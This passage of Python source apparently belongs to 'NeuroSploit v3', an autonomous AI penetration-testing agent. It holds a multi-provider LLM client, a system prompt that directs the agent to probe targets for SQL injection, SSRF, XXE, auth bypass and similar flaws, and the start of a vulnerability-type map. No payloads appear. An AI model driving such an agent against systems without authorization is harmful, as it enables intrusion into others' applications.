""" NeuroSploit v3 - Autonomous AI Security Agent REAL AI-powered penetration testing agent that: 1. Actually calls Claude/OpenAI API for intelligent analysis 2. Performs comprehensive reconnaissance 3. Tests vulnerabilities with proper verification (no false positives) 4. Generates detailed reports with CVSS, PoC, remediation """ import asyncio import aiohttp import json import re import os import hashlib from typing import Dict, List, Any, Optional, Callable, Tuple from dataclasses import dataclass, field, asdict from datetime import datetime from urllib.parse import urljoin, urlparse, parse_qs, urlencode from enum import Enum from pathlib import Path from backend.core.agent_memory import AgentMemory from backend.core.vuln_engine.registry import VulnerabilityRegistry from backend.core.vuln_engine.payload_generator import PayloadGenerator from backend.core.response_verifier import ResponseVerifier from backend.core.negative_control import NegativeControlEngine from backend.core.proof_of_execution import ProofOfExecution from backend.core.confidence_scorer import ConfidenceScorer from backend.core.validation_judge import ValidationJudge from backend.core.vuln_engine.system_prompts import get_system_prompt, get_prompt_for_vuln_type from backend.core.vuln_engine.ai_prompts import get_verification_prompt, get_poc_prompt from backend.core.access_control_learner import AccessControlLearner try: from backend.core.adaptive_learner import AdaptiveLearner HAS_ADAPTIVE_LEARNER = True except ImportError: HAS_ADAPTIVE_LEARNER = False AdaptiveLearner = None from backend.core.request_engine import RequestEngine, ErrorType from backend.core.waf_detector import WAFDetector from backend.core.strategy_adapter import StrategyAdapter from backend.core.chain_engine import ChainEngine from backend.core.auth_manager import AuthManager # Phase 1: Reasoning + Budget + Tasks try: from backend.core.token_budget import TokenBudget HAS_TOKEN_BUDGET = True except ImportError: HAS_TOKEN_BUDGET = 
False TokenBudget = None try: from backend.core.reasoning_engine import ReasoningEngine HAS_REASONING = True except ImportError: HAS_REASONING = False ReasoningEngine = None try: from backend.core.agent_tasks import AgentTaskManager, create_test_task HAS_AGENT_TASKS = True except ImportError: HAS_AGENT_TASKS = False AgentTaskManager = None # Phase 2: Enumeration + Intelligence try: from backend.core.endpoint_classifier import EndpointClassifier HAS_ENDPOINT_CLASSIFIER = True except ImportError: HAS_ENDPOINT_CLASSIFIER = False EndpointClassifier = None try: from backend.core.cve_hunter import CVEHunter HAS_CVE_HUNTER = True except ImportError: HAS_CVE_HUNTER = False CVEHunter = None try: from backend.core.deep_recon import DeepRecon HAS_DEEP_RECON = True except ImportError: HAS_DEEP_RECON = False DeepRecon = None try: from backend.core.banner_analyzer import BannerAnalyzer HAS_BANNER_ANALYZER = True except ImportError: HAS_BANNER_ANALYZER = False BannerAnalyzer = None # Phase 3: Testing + Payload Intelligence try: from backend.core.payload_mutator import PayloadMutator HAS_PAYLOAD_MUTATOR = True except ImportError: HAS_PAYLOAD_MUTATOR = False PayloadMutator = None try: from backend.core.param_analyzer import ParameterAnalyzer HAS_PARAM_ANALYZER = True except ImportError: HAS_PARAM_ANALYZER = False ParameterAnalyzer = None try: from backend.core.xss_validator import XSSValidator HAS_XSS_VALIDATOR = True except ImportError: HAS_XSS_VALIDATOR = False XSSValidator = None # Phase 3.5: Request Repeater + Site Analyzer try: from backend.core.request_repeater import RequestRepeater HAS_REQUEST_REPEATER = True except ImportError: HAS_REQUEST_REPEATER = False RequestRepeater = None try: from backend.core.site_analyzer import SiteAnalyzer HAS_SITE_ANALYZER = True except ImportError: HAS_SITE_ANALYZER = False SiteAnalyzer = None # Phase 4: Exploit Generation + Validation try: from backend.core.exploit_generator import ExploitGenerator HAS_EXPLOIT_GENERATOR = True except 
ImportError: HAS_EXPLOIT_GENERATOR = False ExploitGenerator = None try: from backend.core.poc_validator import PoCValidator HAS_POC_VALIDATOR = True except ImportError: HAS_POC_VALIDATOR = False PoCValidator = None # Phase 5: Multi-Agent Orchestration try: from backend.core.agent_orchestrator import AgentOrchestrator HAS_MULTI_AGENT = True except ImportError: HAS_MULTI_AGENT = False AgentOrchestrator = None # Researcher AI Agent (0-day discovery with Kali sandbox) try: from backend.core.researcher_agent import ResearcherAgent HAS_RESEARCHER = True except ImportError: HAS_RESEARCHER = False ResearcherAgent = None # CLI Agent Runner (AI CLI tools inside Kali sandbox) try: from backend.core.cli_agent_runner import CLIAgentRunner HAS_CLI_AGENT = True except ImportError: HAS_CLI_AGENT = False CLIAgentRunner = None # Phase 5.5: Markdown-based Agent Orchestration (post-recon agent dispatch) try: from backend.core.md_agent import MdAgentOrchestrator HAS_MD_AGENTS = True except ImportError: HAS_MD_AGENTS = False MdAgentOrchestrator = None # Phase 6: Per-Vulnerability-Type Agent Orchestration try: from backend.core.vuln_orchestrator import VulnOrchestrator HAS_VULN_AGENTS = True except ImportError: HAS_VULN_AGENTS = False VulnOrchestrator = None # Phase 7: Checkpoint persistence for crash-resilient resume try: from backend.core.checkpoint_manager import CheckpointManager HAS_CHECKPOINT = True except ImportError: HAS_CHECKPOINT = False CheckpointManager = None # Phase 8: Smart Router (multi-provider failover) try: from backend.core.smart_router import get_router, HAS_SMART_ROUTER except ImportError: HAS_SMART_ROUTER = False get_router = None try: from core.browser_validator import BrowserValidator, embed_screenshot, HAS_PLAYWRIGHT except ImportError: HAS_PLAYWRIGHT = False BrowserValidator = None embed_screenshot = None # Try to import anthropic for Claude API try: import anthropic ANTHROPIC_AVAILABLE = True except ImportError: ANTHROPIC_AVAILABLE = False anthropic = None # 
# Try to import openai
try:
    import openai
    OPENAI_AVAILABLE = True
except ImportError:
    OPENAI_AVAILABLE = False
    openai = None

# Phase 9: RAG Engine (semantic retrieval, few-shot examples, reasoning templates)
try:
    from backend.core.rag import RAGEngine, FewShotSelector, ReasoningMemory, ReasoningTrace, FailureRecord
    from backend.core.rag.reasoning_templates import format_reasoning_prompt
    HAS_RAG = True
except ImportError:
    HAS_RAG = False
    RAGEngine = None
    FewShotSelector = None
    ReasoningMemory = None
    # NOTE(review): ReasoningTrace, FailureRecord and format_reasoning_prompt are
    # NOT nulled out in this branch; any reference to them while HAS_RAG is False
    # raises NameError — confirm all callers guard on HAS_RAG first.

# Pentest Playbook (100 vuln-type testing methodologies)
try:
    from backend.core.vuln_engine.pentest_playbook import (
        get_playbook_entry, get_testing_prompts, get_bypass_strategies,
        get_verification_checklist, build_agent_testing_prompt, get_anti_fp_rules,
        get_chain_attacks, get_playbook_summary,
    )
    HAS_PLAYBOOK = True
except ImportError:
    HAS_PLAYBOOK = False

# Security sandbox (Docker-based real tools)
try:
    from core.sandbox_manager import get_sandbox, SandboxManager
    HAS_SANDBOX = True
except ImportError:
    HAS_SANDBOX = False


class OperationMode(Enum):
    """Agent operation modes.

    Selects how much of the pipeline runs: recon only, fully autonomous
    testing, prompt-driven runs, analysis-only, or CLI/LLM-driven pentests.
    """
    RECON_ONLY = "recon_only"
    FULL_AUTO = "full_auto"
    PROMPT_ONLY = "prompt_only"
    ANALYZE_ONLY = "analyze_only"
    AUTO_PENTEST = "auto_pentest"
    CLI_AGENT = "cli_agent"
    FULL_LLM_PENTEST = "full_llm_pentest"


class FindingSeverity(Enum):
    """Severity buckets for findings (mirrors common VRT/CVSS bands)."""
    CRITICAL = "critical"
    HIGH = "high"
    MEDIUM = "medium"
    LOW = "low"
    INFO = "info"


@dataclass
class CVSSScore:
    """CVSS 3.1 score triple: numeric score, severity label, and vector string."""
    score: float
    severity: str
    vector: str


@dataclass
class Finding:
    """Vulnerability finding with full details.

    Carries everything a report needs: classification (CWE/CVSS), the exact
    request/response evidence, PoC, remediation, and the validation-pipeline
    outputs (confidence scoring, negative controls, AI verification status).
    """
    id: str
    title: str
    severity: str
    vulnerability_type: str = ""
    cvss_score: float = 0.0
    cvss_vector: str = ""
    cwe_id: str = ""
    description: str = ""
    affected_endpoint: str = ""
    parameter: str = ""
    payload: str = ""
    evidence: str = ""
    request: str = ""
    response: str = ""
    impact: str = ""
    poc_code: str = ""
    remediation: str = ""
    references: List[str] = field(default_factory=list)
    screenshots: List[str] = field(default_factory=list)
    affected_urls: List[str] = field(default_factory=list)
    ai_verified: bool = False
    confidence: str = "0"  # Numeric string "0"-"100"
    confidence_score: int = 0  # Numeric confidence score 0-100
    confidence_breakdown: Dict = field(default_factory=dict)  # Scoring breakdown
    proof_of_execution: str = ""  # What proof was found
    negative_controls: str = ""  # Control test results
    ai_status: str = "confirmed"  # "confirmed" | "rejected" | "pending"
    rejection_reason: str = ""
    double_checked: bool = False
    evidence_request: str = ""  # Full HTTP request for report evidence
    evidence_response: str = ""  # Full HTTP response for report evidence


@dataclass
class ReconData:
    """Reconnaissance data collected during the recon phase."""
    subdomains: List[str] = field(default_factory=list)
    live_hosts: List[str] = field(default_factory=list)
    endpoints: List[Dict] = field(default_factory=list)
    parameters: Dict[str, List[str]] = field(default_factory=dict)
    technologies: List[str] = field(default_factory=list)
    forms: List[Dict] = field(default_factory=list)
    js_files: List[str] = field(default_factory=list)
    api_endpoints: List[str] = field(default_factory=list)


def _get_endpoint_url(ep) -> str:
    """Safely get URL from endpoint (handles both str and dict).

    Returns "" for any other type rather than raising.
    """
    if isinstance(ep, str):
        return ep
    elif isinstance(ep, dict):
        return ep.get("url", "")
    return ""


def _get_endpoint_method(ep) -> str:
    """Safely get HTTP method from endpoint; defaults to GET for non-dicts."""
    if isinstance(ep, dict):
        return ep.get("method", "GET")
    return "GET"


class LLMClient:
    """Unified LLM client for Claude, OpenAI, Ollama, and Gemini.

    Also supports Azure OpenAI, Codex, OpenRouter, Together, Fireworks and
    LM Studio; providers are probed in a fixed preference order, and a
    SmartRouter (multi-provider failover) takes precedence when available.
    """
    # Ollama and LM Studio endpoints (overridable via environment)
    OLLAMA_URL = os.getenv("OLLAMA_URL", "http://localhost:11434")
    LMSTUDIO_URL = os.getenv("LMSTUDIO_URL", "http://localhost:1234")
    GEMINI_URL = "https://generativelanguage.googleapis.com/v1beta"

    def __init__(self, preferred_provider: Optional[str] = None, preferred_model: Optional[str] = None):
        """Read API keys from the environment and pick the first usable provider.

        Args:
            preferred_provider: Provider hint passed to the SmartRouter.
            preferred_model: Model hint passed to the SmartRouter.
        """
        self.anthropic_key = os.getenv("ANTHROPIC_API_KEY", "")
        self.openai_key = os.getenv("OPENAI_API_KEY", "")
        self.google_key =
        os.getenv("GEMINI_API_KEY", "") or os.getenv("GOOGLE_API_KEY", "")
        self.together_key = os.getenv("TOGETHER_API_KEY", "")
        self.fireworks_key = os.getenv("FIREWORKS_API_KEY", "")
        self.openrouter_key = os.getenv("OPENROUTER_API_KEY", "")
        self.azure_openai_key = os.getenv("AZURE_OPENAI_API_KEY", "")
        self.azure_openai_endpoint = os.getenv("AZURE_OPENAI_ENDPOINT", "")
        self.azure_openai_api_version = os.getenv("AZURE_OPENAI_API_VERSION", "2024-02-01")
        self.azure_openai_deployment = os.getenv("AZURE_OPENAI_DEPLOYMENT", "")
        self.codex_key = os.getenv("CODEX_API_KEY", "")
        self.ollama_model = os.getenv("OLLAMA_MODEL", "llama3.2")
        self.configured_model = os.getenv("DEFAULT_LLM_MODEL", "")  # User-configured model name
        # `client` is a real SDK object for claude/openai/azure/codex, but only a
        # sentinel string (e.g. "gemini", "ollama") for raw-HTTP providers.
        self.client = None
        self.provider = None
        self.model_name = None  # Actual model name being used
        self.error_message = None
        self.connection_tested = False
        self._smart_router = None
        self._preferred_provider = preferred_provider  # User-selected provider for SmartRouter
        self._preferred_model = preferred_model  # User-selected model for SmartRouter
        # Try SmartRouter first (multi-provider failover); if active, skip
        # direct-provider initialization entirely.
        if HAS_SMART_ROUTER and get_router:
            router = get_router()
            if router:
                self._smart_router = router
                self.provider = "smart_router"
                self.client = "smart_router"
                if preferred_provider and preferred_model:
                    self.model_name = f"{preferred_provider}/{preferred_model}"
                elif preferred_model:
                    self.model_name = preferred_model
                elif preferred_provider:
                    self.model_name = f"{preferred_provider} (auto)"
                else:
                    self.model_name = "auto"
                print(f"[LLM] SmartRouter active (provider={preferred_provider or 'auto'}, model={preferred_model or 'auto'})")
                return
        # Validate keys are not placeholder values (template .env defaults)
        if self.anthropic_key in ["", "your-anthropic-api-key"]:
            self.anthropic_key = None
        if self.openai_key in ["", "your-openai-api-key"]:
            self.openai_key = None
        if self.google_key in ["", "your-google-api-key"]:
            self.google_key = None
        if self.together_key in ["", "your-together-api-key"]:
            self.together_key = None
        if self.fireworks_key in ["", "your-fireworks-api-key"]:
            self.fireworks_key = None
        if self.openrouter_key in ["", "your-openrouter-api-key"]:
            self.openrouter_key = None
        if self.codex_key in ["", "your-codex-api-key"]:
            self.codex_key = None
        if self.azure_openai_key in ["", "your-azure-openai-api-key"]:
            self.azure_openai_key = None
        # Try providers in order of preference
        self._initialize_provider()

    def _initialize_provider(self):
        """Initialize the first available LLM provider.

        Probe order: Claude → OpenAI → Azure OpenAI → Codex → Gemini →
        OpenRouter → Together → Fireworks → Ollama → LM Studio. First
        success wins; failures record an error message and fall through.
        """
        # 1. Try Claude (Anthropic)
        if ANTHROPIC_AVAILABLE and self.anthropic_key:
            try:
                self.client = anthropic.Anthropic(api_key=self.anthropic_key)
                self.provider = "claude"
                self.model_name = self.configured_model or "claude-sonnet-4-20250514"
                print(f"[LLM] Claude API initialized (model: {self.model_name})")
                return
            except Exception as e:
                self.error_message = f"Claude init error: {e}"
                print(f"[LLM] Claude initialization failed: {e}")
        # 2. Try OpenAI
        if OPENAI_AVAILABLE and self.openai_key:
            try:
                self.client = openai.OpenAI(api_key=self.openai_key)
                self.provider = "openai"
                self.model_name = self.configured_model or "gpt-4o"
                print(f"[LLM] OpenAI API initialized (model: {self.model_name})")
                return
            except Exception as e:
                self.error_message = f"OpenAI init error: {e}"
                print(f"[LLM] OpenAI initialization failed: {e}")
        # 2a. Try Azure OpenAI (requires both key and endpoint)
        if OPENAI_AVAILABLE and self.azure_openai_key and self.azure_openai_endpoint:
            try:
                self.client = openai.AzureOpenAI(
                    api_key=self.azure_openai_key,
                    api_version=self.azure_openai_api_version,
                    azure_endpoint=self.azure_openai_endpoint,
                )
                self.provider = "azure_openai"
                # Azure routes by deployment name, not raw model name
                self.model_name = self.azure_openai_deployment or self.configured_model or "gpt-4o"
                print(f"[LLM] Azure OpenAI initialized (deployment: {self.model_name})")
                return
            except Exception as e:
                self.error_message = f"Azure OpenAI init error: {e}"
                print(f"[LLM] Azure OpenAI initialization failed: {e}")
        # 2b. Try Codex (OpenAI-compatible)
        if OPENAI_AVAILABLE and self.codex_key:
            try:
                self.client = openai.OpenAI(api_key=self.codex_key)
                self.provider = "codex"
                self.model_name = self.configured_model or "codex-mini-latest"
                print(f"[LLM] Codex API initialized (model: {self.model_name})")
                return
            except Exception as e:
                self.error_message = f"Codex init error: {e}"
                print(f"[LLM] Codex initialization failed: {e}")
        # 3. Try Google Gemini
        if self.google_key:
            self.client = "gemini"  # Placeholder - uses HTTP requests
            self.provider = "gemini"
            # NOTE(review): "gemini-pro" is a legacy model id — verify it is
            # still served by the v1beta generateContent endpoint.
            self.model_name = self.configured_model or "gemini-pro"
            print(f"[LLM] Gemini API initialized (model: {self.model_name})")
            return
        # 4. Try OpenRouter (multi-model gateway)
        if self.openrouter_key:
            self.client = "openrouter"
            self.provider = "openrouter"
            self.model_name = self.configured_model or "anthropic/claude-sonnet-4-20250514"
            print(f"[LLM] OpenRouter API initialized (model: {self.model_name})")
            return
        # 5. Try Together AI
        if self.together_key:
            self.client = "together"
            self.provider = "together"
            self.model_name = self.configured_model or "meta-llama/Llama-3.3-70B-Instruct-Turbo"
            print(f"[LLM] Together AI initialized (model: {self.model_name})")
            return
        # 6. Try Fireworks AI
        if self.fireworks_key:
            self.client = "fireworks"
            self.provider = "fireworks"
            self.model_name = self.configured_model or "accounts/fireworks/models/llama-v3p3-70b-instruct"
            print(f"[LLM] Fireworks AI initialized (model: {self.model_name})")
            return
        # 7. Try Ollama (local)
        if self._check_ollama():
            self.client = "ollama"  # Placeholder - uses HTTP requests
            self.provider = "ollama"
            self.model_name = self.configured_model or self.ollama_model
            print(f"[LLM] Ollama initialized with model: {self.model_name}")
            return
        # 8. Try LM Studio (local)
        if self._check_lmstudio():
            self.client = "lmstudio"  # Placeholder - uses HTTP requests
            self.provider = "lmstudio"
            self.model_name = self.configured_model or ""
            print("[LLM] LM Studio initialized")
            return
        # No provider available
        self._set_no_provider_error()

    def _check_ollama(self) -> bool:
        """Check if Ollama is running locally (2s probe of /api/tags)."""
        try:
            import requests
            response = requests.get(f"{self.OLLAMA_URL}/api/tags", timeout=2)
            return response.status_code == 200
        except Exception:
            return False

    def _check_lmstudio(self) -> bool:
        """Check if LM Studio is running locally (2s probe of /v1/models)."""
        try:
            import requests
            response = requests.get(f"{self.LMSTUDIO_URL}/v1/models", timeout=2)
            return response.status_code == 200
        except Exception:
            return False

    def _set_no_provider_error(self):
        """Set appropriate error message when no provider is available."""
        errors = []
        if not ANTHROPIC_AVAILABLE and not OPENAI_AVAILABLE:
            errors.append("LLM libraries not installed (run: pip install anthropic openai)")
        all_keys = [self.anthropic_key, self.openai_key, self.google_key, self.openrouter_key, self.together_key, self.fireworks_key, self.codex_key]
        if not any(all_keys):
            errors.append("No API keys configured (set ANTHROPIC_API_KEY, OPENAI_API_KEY, OPENROUTER_API_KEY, GEMINI_API_KEY, TOGETHER_API_KEY, or FIREWORKS_API_KEY)")
        if not self._check_ollama():
            errors.append("Ollama not running locally")
        if not self._check_lmstudio():
            errors.append("LM Studio not running locally")
        self.error_message = "No LLM provider available. " + "; ".join(errors)
        print(f"[LLM] WARNING: {self.error_message}")

    def is_available(self) -> bool:
        # True when either a direct provider or the SmartRouter is configured.
        return self.client is not None or self._smart_router is not None

    def get_status(self) -> dict:
        """Get LLM status for debugging (provider, model, key presence, probes)."""
        status = {
            "available": self.is_available(),
            "provider": self.provider,
            "model": self.model_name,
            "preferred_provider": self._preferred_provider,
            "preferred_model": self._preferred_model,
            "error": self.error_message,
            "anthropic_lib": ANTHROPIC_AVAILABLE,
            "openai_lib": OPENAI_AVAILABLE,
            "ollama_available": self._check_ollama(),
            "lmstudio_available": self._check_lmstudio(),
            "has_google_key": bool(self.google_key),
            "has_together_key": bool(self.together_key),
            "has_fireworks_key": bool(self.fireworks_key),
            "has_openrouter_key": bool(self.openrouter_key),
            "has_codex_key": bool(self.codex_key),
            "smart_router_enabled": self._smart_router is not None,
        }
        if self._smart_router:
            status["smart_router_status"] = self._smart_router.get_status()
        return status

    async def test_connection(self) -> Tuple[bool, str]:
        """Test if the API connection is working.

        Returns:
            (ok, message) — ok is True only on a non-empty model response.
        """
        if not self.client:
            return False, self.error_message or "No LLM client configured"
        try:
            # Simple test prompt
            result = await self.generate("Say 'OK' if you can hear me.", max_tokens=10)
            if result:
                self.connection_tested = True
                return True, f"Connected to {self.provider}"
            return False, f"Empty response from {self.provider}"
        except Exception as e:
            return False, f"Connection test failed for {self.provider}: {str(e)}"

    async def generate(self, prompt: str, system: str = "", max_tokens: int = 4096) -> str:
        """Generate response from LLM.

        Args:
            prompt: User prompt.
            system: System prompt; falls back to a pentest-analyst default.
            max_tokens: Output token cap passed through to the provider.

        Returns:
            The model's text response.

        Raises:
            LLMConnectionError: When no provider is configured or the call fails.
        """
        if not self.client:
            raise LLMConnectionError(self.error_message or "No LLM provider available")
        default_system = "You are an expert penetration tester and security researcher. Provide accurate, technical, and actionable security analysis. Be precise and avoid false positives."
        # SmartRouter delegation with fallback
        if self._smart_router:
            try:
                result = await self._smart_router.generate(
                    prompt=prompt,
                    system=system or default_system,
                    max_tokens=max_tokens,
                    preferred_provider=self._preferred_provider,
                    model=self._preferred_model,
                )
                # Update model_name with what was actually used
                if self._smart_router._last_provider:
                    new_name = f"{self._smart_router._last_provider}/{self._smart_router._last_model}"
                    if new_name != self.model_name:
                        self.model_name = new_name
                        print(f"[LLM] Using: {self._smart_router._last_account_label} → {new_name}")
                return result
            except Exception as e:
                print(f"[LLM] SmartRouter failed, falling back to direct: {e}")
                # Fall through to direct provider logic if available
                if not self.anthropic_key and not self.openai_key and not self.google_key:
                    raise LLMConnectionError(f"SmartRouter failed and no direct provider: {e}")
        try:
            if self.provider == "claude":
                message = self.client.messages.create(
                    model=self.model_name or "claude-sonnet-4-20250514",
                    max_tokens=max_tokens,
                    system=system or default_system,
                    messages=[{"role": "user", "content": prompt}]
                )
                return message.content[0].text
            elif self.provider == "openai":
                response = self.client.chat.completions.create(
                    model=self.model_name or "gpt-4o",
                    max_tokens=max_tokens,
                    messages=[
                        {"role": "system", "content": system or default_system},
                        {"role": "user", "content": prompt}
                    ]
                )
                return response.choices[0].message.content
            elif self.provider == "codex":
                response = self.client.chat.completions.create(
                    model=self.model_name or "codex-mini-latest",
                    max_tokens=max_tokens,
                    messages=[
                        {"role": "system", "content": system or default_system},
                        {"role": "user", "content": prompt}
                    ]
                )
                return response.choices[0].message.content
            elif self.provider == "azure_openai":
                response = self.client.chat.completions.create(
                    model=self.model_name or "gpt-4o",
                    max_tokens=max_tokens,
                    messages=[
                        {"role": "system", "content": system or default_system},
                        {"role": "user", "content": prompt}
                    ]
                )
                return response.choices[0].message.content
            elif self.provider == "gemini":
                return await self._generate_gemini(prompt, system or default_system, max_tokens)
            elif self.provider == "openrouter":
                return await self._generate_openai_compatible(
                    prompt, system or default_system, max_tokens,
                    url="https://openrouter.ai/api/v1/chat/completions",
                    api_key=self.openrouter_key,
                    model=self.model_name or "anthropic/claude-sonnet-4-20250514",
                    extra_headers={"HTTP-Referer": "https://neurosploit.ai", "X-Title": "NeuroSploit"},
                )
            elif self.provider == "together":
                return await self._generate_openai_compatible(
                    prompt, system or default_system, max_tokens,
                    url="https://api.together.xyz/v1/chat/completions",
                    api_key=self.together_key,
                    model=self.model_name or "meta-llama/Llama-3.3-70B-Instruct-Turbo",
                )
            elif self.provider == "fireworks":
                return await self._generate_openai_compatible(
                    prompt, system or default_system, max_tokens,
                    url="https://api.fireworks.ai/inference/v1/chat/completions",
                    api_key=self.fireworks_key,
                    model=self.model_name or "accounts/fireworks/models/llama-v3p3-70b-instruct",
                )
            elif self.provider == "ollama":
                return await self._generate_ollama(prompt, system or default_system)
            elif self.provider == "lmstudio":
                return await self._generate_lmstudio(prompt, system or default_system, max_tokens)
        except LLMConnectionError:
            raise
        except Exception as e:
            error_msg = str(e)
            print(f"[LLM] Error from {self.provider}: {error_msg}")
            raise LLMConnectionError(f"API call failed ({self.provider}): {error_msg}")
        # NOTE(review): unknown provider (including "smart_router" after a router
        # failure with direct keys present) silently returns "" here — callers
        # treating "" as a valid model answer should verify this is intended.
        return ""

    async def _generate_openai_compatible(
        self, prompt: str, system: str, max_tokens: int,
        url: str = "", api_key: str = "", model: str = "",
        extra_headers: dict = None,
    ) -> str:
        """Generate using any OpenAI-compatible API (OpenRouter, Together, Fireworks)."""
        import aiohttp
        headers = {
            "Authorization": f"Bearer {api_key}",
            "Content-Type": "application/json",
        }
        if extra_headers:
            headers.update(extra_headers)
        payload = {
            "model": model,
            "messages": [
                {"role": "system", "content": system},
                {"role": "user", "content": prompt}
            ],
            "max_tokens": max_tokens,
        }
        async with aiohttp.ClientSession() as session:
            async with session.post(url, json=payload, headers=headers, timeout=aiohttp.ClientTimeout(total=120)) as response:
                if response.status != 200:
                    error_text = await response.text()
                    raise LLMConnectionError(f"API error ({response.status}): {error_text[:500]}")
                data = await response.json()
                return data.get("choices", [{}])[0].get("message", {}).get("content", "")

    async def _generate_gemini(self, prompt: str, system: str, max_tokens: int) -> str:
        """Generate using Google Gemini API.

        Gemini v1beta has no separate system role here, so the system prompt is
        prepended to the user prompt in a single text part.
        """
        import aiohttp
        gemini_model = self.model_name or "gemini-pro"
        url = f"{self.GEMINI_URL}/models/{gemini_model}:generateContent?key={self.google_key}"
        payload = {
            "contents": [{"parts": [{"text": f"{system}\n\n{prompt}"}]}],
            "generationConfig": {"maxOutputTokens": max_tokens}
        }
        async with aiohttp.ClientSession() as session:
            async with session.post(url, json=payload, timeout=aiohttp.ClientTimeout(total=60)) as response:
                if response.status != 200:
                    error_text = await response.text()
                    raise LLMConnectionError(f"Gemini API error ({response.status}): {error_text}")
                data = await response.json()
                return data.get("candidates", [{}])[0].get("content", {}).get("parts", [{}])[0].get("text", "")

    async def _generate_ollama(self, prompt: str, system: str) -> str:
        """Generate using local Ollama (non-streaming /api/generate)."""
        import aiohttp
        url = f"{self.OLLAMA_URL}/api/generate"
        payload = {
            "model": self.model_name or self.ollama_model,
            "prompt": prompt,
            "system": system,
            "stream": False
        }
        async with aiohttp.ClientSession() as session:
            async with session.post(url, json=payload, timeout=aiohttp.ClientTimeout(total=120)) as response:
                if response.status != 200:
                    error_text = await response.text()
                    raise LLMConnectionError(f"Ollama error ({response.status}): {error_text}")
                data = await response.json()
                return data.get("response", "")

    async def _generate_lmstudio(self, prompt: str, system: str, max_tokens: int) -> str:
        """Generate using LM Studio (OpenAI-compatible)"""
        import aiohttp
        url = f"{self.LMSTUDIO_URL}/v1/chat/completions"
        payload = {
            "messages": [
                {"role": "system", "content": system},
                {"role": "user", "content": prompt}
            ],
            "max_tokens": max_tokens,
            "stream": False
        }
        async with aiohttp.ClientSession() as session:
            async with session.post(url, json=payload, timeout=aiohttp.ClientTimeout(total=120)) as response:
                if response.status != 200:
                    error_text = await response.text()
                    raise LLMConnectionError(f"LM Studio error ({response.status}): {error_text}")
                data = await response.json()
                return data.get("choices", [{}])[0].get("message", {}).get("content", "")


class LLMConnectionError(Exception):
    """Exception raised when LLM connection fails"""
    pass


# System prompt injected when no custom assessment prompt is supplied.
DEFAULT_ASSESSMENT_PROMPT = """You are NeuroSploit, an elite autonomous penetration testing AI agent. Your mission: identify real, exploitable vulnerabilities — zero false positives. ## METHODOLOGY (PTES/OWASP/WSTG aligned) ### Phase 1 — Reconnaissance & Fingerprinting - Discover all endpoints, parameters, forms, API paths, WebSocket URLs - Technology fingerprinting: language, framework, server, WAF, CDN - Identify attack surface: file upload, auth endpoints, admin panels, GraphQL ### Phase 2 — Technology-Guided Prioritization Select vulnerability types based on detected technology stack: - PHP/Laravel → LFI, command injection, SSTI (Blade), SQLi, file upload - Node.js/Express → NoSQL injection, SSRF, prototype pollution, SSTI (EJS/Pug) - Python/Django/Flask → SSTI (Jinja2), command injection, IDOR, mass assignment - Java/Spring → XXE, insecure deserialization, expression language injection, SSRF - ASP.NET → path traversal, XXE, header injection, insecure deserialization - API/REST → IDOR, BOLA, BFLA, JWT manipulation, mass assignment, rate limiting - GraphQL → introspection, injection, DoS via nested queries - WordPress → file upload, SQLi, XSS, exposed admin, plugin vulns ### Phase 3 — Active Testing (100 vuln types available) **OWASP
Top 10 2021 coverage:** - A01 Broken Access Control: IDOR, BOLA, BFLA, privilege escalation, forced browsing, CORS - A02 Cryptographic Failures: weak encryption/hashing, cleartext transmission, SSL issues - A03 Injection: SQLi (error/union/blind/time), NoSQL, LDAP, XPath, command, SSTI, XSS, XXE - A04 Insecure Design: business logic, race condition, mass assignment - A05 Security Misconfiguration: headers, debug mode, directory listing, default creds - A06 Vulnerable Components: outdated dependencies, insecure CDN - A07 Auth Failures: JWT, session fixation, brute force, 2FA bypass, OAuth misconfig - A08 Data Integrity: insecure deserialization, cache poisoning, HTTP smuggling - A09 Logging Failures: log injection, improper error handling - A10 SSRF: standard SSRF, cloud metadata SSRF ### Phase 4 — Verification (multi-signal) Every finding MUST have: 1. Concrete HTTP evidence (request + response) 2. At least 2 verification signals OR high-confidence tester match 3. No speculative language — only confirmed exploitable issues 4. 
Screenshot capture when possible ### Phase 5 — Reporting - Each finding: title, severity, CVSS 3.1, CWE, PoC, impact, remediation - Prioritized by real-world exploitability - Executive summary with risk rating ## CRITICAL RULES - NEVER report theoretical/speculative vulnerabilities - ALWAYS verify with real HTTP evidence before confirming - Test systematically: every parameter, every endpoint, every form - Use technology hints to select the most relevant tests - Capture baseline responses before testing for accurate diff-based detection """ class AutonomousAgent: """ AI-Powered Autonomous Security Agent Performs real security testing with AI-powered analysis """ # Legacy vuln type → registry key mapping VULN_TYPE_MAP = { # Aliases → canonical registry keys "sqli": "sqli_error", "xss": "xss_reflected", "rce": "command_injection", "cors": "cors_misconfig", "lfi_rfi": "lfi", "file_inclusion": "lfi", "remote_code_execution": "command_injection", "broken_auth": "auth_bypass", "broken_access": "bola", "api_abuse": "rest_api_versioning", # Identity mappings — Injection (18) "sqli_error": "sqli_error", "sqli_union": "sqli_union", "sqli_blind": "sqli_blind", "sqli_time": "sqli_time", "command_injection": "command_injection", "ssti": "ssti", "nosql_injection": "nosql_injection", "ldap_injection": "ldap_injection", "xpath_injection": "xpath_injection", "graphql_injection": "graphql_injection", "crlf_injection": "crlf_injection", "header_injection": "header_injection", "email_injection": "email_injection", "expression_language_injection": "expression_language_injection", "log_injection": "log_injection", "html_injection": "html_injection", "csv_injection": "csv_injection", "orm_injection": "orm_injection", # XSS (5) "xss_reflected": "xss_reflected", "xss_stored": "xss_stored", "xss_dom": "xss_dom", "blind_xss": "blind_xss", "mutation_xss": "mutation_xss", # File Access (8) "lfi": "lfi", "rfi": "rfi", "path_traversal": "path_traversal", "xxe": "xxe", "file_upload": 
